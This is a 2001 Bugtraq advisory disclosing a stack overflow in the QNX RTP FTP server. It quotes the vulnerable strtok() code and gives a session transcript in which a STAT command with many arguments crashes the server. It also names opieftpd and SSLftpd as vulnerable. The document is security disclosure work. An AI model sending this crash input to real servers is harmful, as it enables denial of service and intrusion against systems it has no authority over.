from Bugtraq,
Date: Fri, 2 Feb 2001 20:03:09 +0100
From: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: QNX RTP ftpd stack overflow
QNX RTP uses a BSD derived FTP server, which is vulnerable to strtok()
based stack overflow.
Offending code from ftpd/popen.c:
char **pop, *argv[100], *gargv[1000], *vv[2];
for (argc = 0, cp = program;; cp = NULL)
if (!(argv[argc++] = strtok(cp, " \t\n")))
break;
/* glob each piece */
gargv[0] = argv[0];
for (gargc = argc = 1; argv[argc]; argc++) {
argv[argc] = strdup(argv[argc]);
Code is called, when STAT command is issued. Overflow occurs, when large
number of arguments is applied.
Identifing vulnerable system:
220 quics.qnx.com FTP server (Version 5.60) ready.
user ftp
331 Guest login ok, send ident as password.
pass dupa
230 Guest login ok, access restrictions apply.
stat a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
Connection closed by foreign host.
BTW. Old BSD derived ftpd is also used in opieftpd and SSLftpd. Both are
vulnerable to this attack.
–
- Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
- Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *